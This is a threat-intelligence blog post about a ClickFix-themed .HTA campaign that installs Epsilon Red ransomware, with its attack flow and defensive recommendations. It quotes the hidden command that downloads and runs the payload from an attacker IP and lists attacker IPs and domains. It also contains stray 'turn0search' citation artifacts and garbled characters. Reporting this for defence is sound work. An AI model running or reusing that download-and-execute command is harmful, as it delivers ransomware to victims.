Bivash Nayak
26 Jul
26Jul

Published on: July 26, 2025

By: CyberDudeBivash Editorial Team

Website:cyberdudebivash.com


🚨 What’s Going On: .HTA-Based Ransomware Campaign Hits Windows

Recent reports reveal a global ransomware campaign that tricks users into downloading malicious .HTA (HTML Application) files. These files silently install Epsilonβ€―Red ransomware, masquerading as benign β€œClickFix” verification pages themed around platforms like Discord, Twitch, Kick, and OnlyFans.(turn0search1, turn0search0)


πŸ” Attack Flow: How the Exploit Works

  1. Visit a fake β€œverification” pageβ€”victims click a button labeled as β€œClickFix” that appears harmless.
  2. JavaScript loads an ActiveXObject (WScript.Shell) via the .HTA file.
  3. It runs a hidden command:
    cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe
  • This silently downloads and executes a.exe (Epsilon Red ransomware) with no visible interface.(turn0search1, turn0search0)
  • Finally, a fake verification prompt shows:
    Your Verificatification Code Is: PC‑19fj5e9i‑cje8i3e4

Your Verificatification Code Is: PC‑19fj5e9i‑cje8i3e4
intended to distract the victim while the ransomware runs.(turn0search1, turn0search0)


🧩 Why It’s Effective

  • Abuses legacy ActiveX in IE/mshta.exe environmentsβ€”still active in many enterprise systems.
  • Bypasses browser-based defenses like SmartScreen and download warnings.
  • Minimal user interaction required beyond clicking a button.
  • Low forensic footprint at initial stagesβ€”no visible binaries or prompts until encryption starts.

πŸ›‘οΈ Recommended Actions to Protect Your Organization

βœ… Disable ActiveX and WSH Execution

Block mshta.exe, ActiveXObject usage, and WScript.Shell via Group Policy or AppLocker.

βœ… Block Known Threat Infrastructure

Blacklist IPs such as:

  • 155.94.155.227:2269
  • 213.209.150.188:8112
    and related domains like twtich[.]cc, capchabot[.]cc.(turn0search1, turn0search0)

βœ… Harden Email and Web Filtering

  • Intercept .HTA downloads.
  • Block or sandbox suspicious fake verification pages.

βœ… Monitor Suspicious Commands

Use EDR to detect shell.Run, hidden curl downloads, or mshta.exe spawning cmd.exe in user context.

βœ… Train Users Against Social Engineering

Educate users not to run files from unknown sitesβ€”even pages that mimic trusted services.


🧠 Broader Implications

This campaign shows how outdated technologies like ActiveX still pose high risks. The combination of social engineering, browser exploitation, and zero‑artifact execution makes it a versatile deception tool. Attackers can deploy ransomware like Epsilon Red stealthily, even in hardened environments.

β€œThis new method leverages trusted Windows capabilities to deliver ransomware stealthilyβ€”defenders must rethink browser attack protection holistically.”
β€” CyberDudeBivash Editorial

πŸ”‘ Key Takeaways

  • .HTA files embedded with JavaScript and ActiveX are launching ransomware silently.
  • Epsilon Red leverages this technique to infect systems without visible payloads until encryption occurs.
  • Blocking legacy script interfaces, monitoring mshta.exe execution, and educating users are immediate lines of defense.

πŸ’¬ Join the Conversation

Have you seen suspicious .HTA activity or mshta.exe spawning hidden processes?

Share insights or experiences in the comments or tweet us at @CyberDudeBivash!


πŸ”— Stay Secure with CyberDudeBivash

For real-time alerts on emerging ransomware tactics, legacy attack vectors, and actionable cybersecurity strategiesβ€”subscribe to our Cyber Magazine: cyberdudebivash.com


Tags: #EpsilonRed #HTAattack #Ransomware #ActiveXExploitation #LegacySecurity #MSHTA #CyberThreatIntel #Cybersecurity #CyberDudeBivash



Comments
* The email will not be published on the website.